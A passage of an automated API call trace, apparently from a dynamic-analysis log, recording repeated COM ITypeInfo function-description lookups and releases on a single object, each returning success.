ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.696] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x29, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2a, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2b, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2c, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2d, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2e, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2f, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x30, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x31, ppFuncDesc=0x1dd598, pDummy=0x1a0 | out: ppFuncDesc=0x1dd598, pDummy=0x1a0) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x32, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x33, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x34, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x35, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x36, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x37, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x38, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.697] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.697] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x39, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3a, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3b, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3c, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3d, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3e, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3f, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x40, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x41, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x42, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x43, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x44, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x45, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x46, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x47, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.698] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.698] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x48, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x49, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4a, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4b, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4c, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4d, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4e, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4f, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x50, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x51, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x52, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x53, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x54, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x55, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x56, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.699] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.699] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x57, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x58, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x59, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5a, ppFuncDesc=0x1dd598, pDummy=0x1a0 | out: ppFuncDesc=0x1dd598, pDummy=0x1a0) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5b, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5c, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5d, ppFuncDesc=0x1dd598, pDummy=0x160 | out: ppFuncDesc=0x1dd598, pDummy=0x160) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5e, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5f, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x60, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x61, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x62, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x63, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x64, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x65, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.700] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x66, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.700] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x67, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x68, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x69, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6a, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6b, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6c, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6d, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6e, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6f, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x70, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x71, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x72, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x73, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x74, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.701] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.701] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x75, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x76, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x77, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x78, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x79, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7a, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7b, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7c, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7d, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7e, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7f, ppFuncDesc=0x1dd598, pDummy=0x1a0 | out: ppFuncDesc=0x1dd598, pDummy=0x1a0) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x80, ppFuncDesc=0x1dd598, pDummy=0x1a0 | out: ppFuncDesc=0x1dd598, pDummy=0x1a0) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x81, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x82, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x83, ppFuncDesc=0x1dd598, pDummy=0x160 | out: ppFuncDesc=0x1dd598, pDummy=0x160) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.702] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x84, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.702] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x85, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x86, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x87, ppFuncDesc=0x1dd598, pDummy=0x1a0 | out: ppFuncDesc=0x1dd598, pDummy=0x1a0) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x88, ppFuncDesc=0x1dd598, pDummy=0x160 | out: ppFuncDesc=0x1dd598, pDummy=0x160) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x89, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8a, ppFuncDesc=0x1dd598, pDummy=0x1a0 | out: ppFuncDesc=0x1dd598, pDummy=0x1a0) returned 0x0 [0157.703] 